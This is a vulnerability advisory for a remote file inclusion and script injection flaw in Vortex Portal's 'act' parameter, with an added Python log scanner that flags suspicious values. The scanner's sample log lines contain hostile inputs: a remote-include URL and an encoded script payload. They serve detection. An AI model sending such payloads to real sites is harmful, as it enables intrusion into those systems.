Vortex Portal Content Management System Multiple Remote File Inclusion

Medium

Synopsis

The remote host is vulnerable to a script injection attack.

Description

The remote host is running Vortex Portal, a content-management system for gaming. This version of Vortex is vulnerable to an 'include' file injection attack. Specifically, the 'act' variable of 'content.php' and 'index.php' is not properly sanitized by the Vortex application. An attacker exploiting this flaw would be able to include arbitrary malicious code within a URI. The attacker would then need to be able to convince a client to browse to the URI. A successful attack would result in the client browser executing malicious code within the context of the Vortex application.

Solution

Ensure that this application is allowed within corporate policies and guidelines.
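
A log check for the unsanitized 'act' parameter described above, as an added example that is not part of the original advisory or of Vortex Portal. The allowlist pattern for legitimate 'act' values, the combined access-log format, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts named in the advisory as taking the unsanitized 'act' parameter.
TARGET_SCRIPTS = ("content.php", "index.php")
# Assumption: legitimate 'act' values are short page identifiers.
SAFE_ACT = re.compile(r"[A-Za-z0-9_-]{1,64}")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_act_values(log_line):
    """Return 'act' values in the line that fall outside the allowlist."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    # Compare the final path segment so /portal/index.php is also covered.
    if url.path.rsplit("/", 1)[-1].lower() not in TARGET_SCRIPTS:
        return []
    # parse_qs percent-decodes values, so encoded input is checked decoded.
    values = parse_qs(url.query, keep_blank_values=True).get("act", [])
    return [v for v in values if not SAFE_ACT.fullmatch(v)]


def scan(lines):
    """Yield (line_number, bad_values) for each flagged log line."""
    for number, line in enumerate(lines, start=1):
        bad = suspicious_act_values(line)
        if bad:
            yield number, bad


# Constructed sample log lines (documentation addresses and hosts only).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?act=news HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /content.php?act=http%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 200 312',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?act=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5200',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /forum.php?act=http://example.invalid/ HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for number, bad in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious act value(s): {bad}")
```

The same allowlist, applied server-side before 'act' reaches an include or is echoed into a page, is the corresponding input-validation control.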